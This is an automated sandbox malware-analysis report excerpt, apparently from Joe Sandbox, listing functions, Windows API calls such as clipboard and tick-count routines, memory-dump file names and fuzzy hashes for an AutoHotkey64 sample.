GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 86e629109acdf998648e60c23f865ff2cbc16cb141e1c6a239900a8fe7126f95
Instruction ID: 463d799334610d8e29a5ce9e8aeb3594fd032f8b1c3b54536951c5c913ea888c
Opcode Fuzzy Hash: 86e629109acdf998648e60c23f865ff2cbc16cb141e1c6a239900a8fe7126f95
Instruction Fuzzy Hash: D2A1BFB2204B4485FB568B2AE4443E837E1F74DBE4F110226EB5963BF5DB38C895C704

Function 0000000140044BE5 Relevance: 9.2, APIs: 6, Instructions: 206windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID:
API String ID: 130734711-0
Opcode ID: 1f0a8a4e60bf686d823ac32a3940d10f3030e0a24acb447cba67fcefa8c9900d
Instruction ID: 6d4a78c8f736becb1523509ed611cd958603d7393054430846e6ca92ce7633ba
Opcode Fuzzy Hash: 1f0a8a4e60bf686d823ac32a3940d10f3030e0a24acb447cba67fcefa8c9900d
Instruction Fuzzy Hash: 53A1C4B160064485FB578B27E8943E937A1F78DBE4F120226FB5963AF6DB38C481C745

Function 0000000140040C4C Relevance: 9.2, APIs: 6, Instructions: 206windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 1cf948782002bc5a3406a63f51610c913fe0bc88c87a3bf9c7b84953d0171c0d
Instruction ID: 3220f460ab83bad3fddb6dd8fac5ff3d7541a764082bc18025d6c584a4a76bd4
Opcode Fuzzy Hash: 1cf948782002bc5a3406a63f51610c913fe0bc88c87a3bf9c7b84953d0171c0d
Instruction Fuzzy Hash: 75A18072604B4486FB668B27E8843E937A1F34DBE4F11022AEB5963BF5DB38C490C705

Function 00000001400454A1 Relevance: 9.2, APIs: 6, Instructions: 205windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Part of subcall function 00000001400642E0: SendMessageW.USER32 ref: 0000000140064489

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountMessageTick$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 38145316-0
Opcode ID: 4795d242ba0ca5feb9165d84f2f325bea4653545ffdef6961f00dc054c96eb3c
Instruction ID: 10f2db81da7d7e4f53bde7e70f792ff48a649c2a412a301e9703bff1535b2d6b
Opcode Fuzzy Hash: 4795d242ba0ca5feb9165d84f2f325bea4653545ffdef6961f00dc054c96eb3c
Instruction Fuzzy Hash: 77A1B4B160464486F7668B27E4843E937E1F38D7E4F11022AFB59A76F6DB38C894C705

Function 0000000140040CBC Relevance: 9.2, APIs: 6, Instructions: 202windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140049BB0: free.LIBCMT ref: 0000000140049C55
Part of subcall function 0000000140049BB0: free.LIBCMT ref: 0000000140049D13

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$free$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 2285768414-0
Opcode ID: eb65aa3bd2d997ae5ecf11a219bfe8edf25426f0f4bef3f129d42102e9d74664
Instruction ID: c478140457f8324adbdb2e96dfcaa77a7b804ddb1dd4e27cef1e1fc7964437f3
Opcode Fuzzy Hash: eb65aa3bd2d997ae5ecf11a219bfe8edf25426f0f4bef3f129d42102e9d74664
Instruction Fuzzy Hash: 9FA19071600B4486FB668B27E8843E837A1F34DBE4F110226EB5963BF5DB38C490C705

Function 0000000140040C8E Relevance: 9.2, APIs: 6, Instructions: 201windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: ad7ecca772277652a96d01c5b9f12c95eda0ed5bafe172b0903e62919cf7b937
Instruction ID: 66bead676b6f009f50451c58bee4f8e770145f22bee7c57c1bce2c2f35e9f53d
Opcode Fuzzy Hash: ad7ecca772277652a96d01c5b9f12c95eda0ed5bafe172b0903e62919cf7b937
Instruction Fuzzy Hash: 17A19071600B4486FB668B27E8843E837A1F34DBE4F11022AEB5963BF5DB38C490C705

Function 00000001400449AF Relevance: 9.2, APIs: 6, Instructions: 200windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID:
API String ID: 130734711-0
Opcode ID: 6c957abbb577430c1bfefcd84d3d15b272f39ad487ffa8d58e1b07d1dccd1ea3
Instruction ID: 9e50bc8602910e7ad827cdd4bdd584e280ac88baf21d06d4227ebacfe2534ae5
Opcode Fuzzy Hash: 6c957abbb577430c1bfefcd84d3d15b272f39ad487ffa8d58e1b07d1dccd1ea3
Instruction Fuzzy Hash: 9EA1D2B120068486F766CF27E8843E937A1F38DBE4F110226EB59676F2DB38C895C744

Function 00000001400452C1 Relevance: 9.2, APIs: 6, Instructions: 200windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: eeda11dcbffb4385379e4126e70b02b4f4d20a871f881e62c4bdb5ba7e03e964
Instruction ID: 59de11102fbfa3c61fdc29bd96e473f10ac4577ce5df94776d87ae7f8fa15616
Opcode Fuzzy Hash: eeda11dcbffb4385379e4126e70b02b4f4d20a871f881e62c4bdb5ba7e03e964
Instruction Fuzzy Hash: D8A1B4B160464486FB668B27E4843E937A1F38DBE4F15022AFB5963BF6DB38C490C745

Function 0000000140045732 Relevance: 9.2, APIs: 6, Instructions: 200windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 6743d1120be18396e668ed32ecaedb796f86044b3353cfe6d84e8f0f7f659169
Instruction ID: a6e3b79edad9b6c085aa3fb4574c6107971de9b7354db4e190b073cbf1fd12dd
Opcode Fuzzy Hash: 6743d1120be18396e668ed32ecaedb796f86044b3353cfe6d84e8f0f7f659169
Instruction Fuzzy Hash: E0A191B160464486F7668B27E4443E937A1F78DBE4F110226EB59A3BF6DB38C890C745

Function 0000000140043AC5 Relevance: 9.2, APIs: 6, Instructions: 200windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140062000: GetForegroundWindow.USER32 ref: 000000014006207F
Part of subcall function 0000000140062000: IsIconic.USER32 ref: 0000000140062090
Part of subcall function 0000000140062000: GetWindowRect.USER32 ref: 00000001400620A5
Part of subcall function 0000000140062000: GetSystemMetrics.USER32 ref: 0000000140062174
Part of subcall function 0000000140062000: GetSystemMetrics.USER32 ref: 0000000140062181

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$MetricsSystemWindow$ClipboardCloseForegroundGlobalIconicMessagePeekRectUnlock
String ID:
API String ID: 565195155-0
Opcode ID: d5376c92f6ab38788845c500e2a96ced26de30a2e703343732327425f9eaa718
Instruction ID: 433ca97cabd935856339f70ab1046670045dce8847c1b5ddb33289428c6cac66
Opcode Fuzzy Hash: d5376c92f6ab38788845c500e2a96ced26de30a2e703343732327425f9eaa718
Instruction Fuzzy Hash: E5A1C3B160464486F7628B27E4443E937A1F38DBE4F110226FB5967BF6DB38C491C745

Function 0000000140044E7F Relevance: 9.2, APIs: 6, Instructions: 198windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 30f5fbede729a5a965568a17edbefb6d69b5da2238b6b4336af110425dfdfcd3
Instruction ID: 7d6990891fd3375bb13475b4229180f52efc09150d132431ab0584767c4a26d6
Opcode Fuzzy Hash: 30f5fbede729a5a965568a17edbefb6d69b5da2238b6b4336af110425dfdfcd3
Instruction Fuzzy Hash: 2EA1B2B160464486F7668B27E4443E937A1F38DBE4F120226FB59A3BF6DB38C890C745

Function 00000001400431C3 Relevance: 9.2, APIs: 6, Instructions: 198windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: d3be52846ed59f2c8d0ce298015ec2cda8d1451f315c818fd4193533326b1bd4
Instruction ID: 3861e2c9d581f779b23f27c0da4fdc8cc417e91c863f75a9d7d421d7d3a888c5
Opcode Fuzzy Hash: d3be52846ed59f2c8d0ce298015ec2cda8d1451f315c818fd4193533326b1bd4
Instruction Fuzzy Hash: 4AA1D3B160468486FB668B27E4443E937E1F38DBE4F110226EB5963BF6DB38C480C704

Function 000000014004521C Relevance: 9.2, APIs: 6, Instructions: 198windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 220000606b55a00b0fdd6f922d5804c444042ca9f0b81f3443d18cd0419db7ac
Instruction ID: f6f8f6669352003365fcc3e99b33b38e9e1dbff4efbbea16d90c03c67370830b
Opcode Fuzzy Hash: 220000606b55a00b0fdd6f922d5804c444042ca9f0b81f3443d18cd0419db7ac
Instruction Fuzzy Hash: 02A1B4B160464486FB668B27E4843E937A1F38DBE4F110226FB5963BF6DB78C490C745

Function 000000014004413B Relevance: 9.2, APIs: 6, Instructions: 197windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140087E30: GetSystemMenu.USER32 ref: 0000000140087F0C
Part of subcall function 0000000140087E30: GetMenuItemCount.USER32 ref: 0000000140087F37
Part of subcall function 0000000140087E30: GetMenuItemID.USER32 ref: 0000000140087FD5

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Count$MenuTick$Item$ClipboardCloseGlobalMessagePeekSystemUnlock
String ID:
API String ID: 1587163017-0
